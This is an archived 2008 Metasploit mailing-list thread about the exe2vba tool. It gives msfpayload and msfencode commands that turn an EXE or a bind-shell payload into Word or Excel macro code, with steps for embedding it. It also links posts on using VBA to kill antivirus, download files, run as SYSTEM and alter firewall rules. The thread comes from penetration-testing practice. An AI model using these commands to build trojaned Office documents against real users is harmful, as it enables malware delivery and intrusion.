Metasploit mailing list archives
Fwd: Exe2vba - Anybody still have this?
From: natron at invisibledenizen.org (natron)
Date: Mon, 17 Nov 2008 10:27:46 -0600
In case anyone finds this type of thing helpful, here are a series of posts showing how to use VBA to perform various actions, like kill AV, modify the windows firewall, or download files. Useful to Kill AV, then unpack an msf payload that might trigger antivirus as soon as it's written to the hard drive, but before it's able to execute. n ---------- Forwarded message ---------- From: natron <natron at invisibledenizen.org> Date: Sun, Nov 16, 2008 at 8:50 PM Subject: Re: Exe2vba - Anybody still have this? To: H D Moore <sflist at digitaloffense.net>, pen-test at securityfocus.com, Joseph McCray <joe at learnsecurityonline.com> I wrote up a quick series of posts on how to use VBA to do all kinds of things, as long as the user running the Excel/Word file has the necessary rights. If anyone would find them useful: Running commands or launching programs: http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents.html Downloading files and saving them to disk: http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html Running commands as SYSTEM: http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html Killing off any antivirus that may be running: http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html Modifying the Windows Firewall: http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-from.html What I would really love to see would be a combination of the Churrasco exploit (http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html) into VBA, so that even if the user is running in a limited account, they'd be able to gain SYSTEM privileges. -n On Wed, Nov 12, 2008 at 1:21 PM, H D Moore <sflist at digitaloffense.net> wrote:
Hi Joseph, I added this to Metasploit. You can use the VBA generator in a few different ways: 1) Convert an EXE to a VBA script (works on Word/Excel automatically): $ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba 2) Create a VBA script that runs a Metasploit payload $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba 3) Create a VBA script that runs an encoded Metasploit payload $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \ ruby msf3/msfencode -a x86 -b '' -t vba > output.vba To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual Basic Editor, paste in, save, and exit. Works pretty well here :-) You need the latest SVN of Metasploit 3.2 trunk: $ svn co http://metasploit.com/svn/framework3/trunk/ On Windows, follow this guide: - http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN -HD On Tuesday 11 November 2008, Joseph McCray wrote:It used to be located at: http://www.priestmaster.org/tools.html I've been looking all over the web and really haven't been able to find this app anymore.------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report ------------------------------------------------------------------------
Current thread:
- Fwd: Exe2vba - Anybody still have this? natron (Nov 17)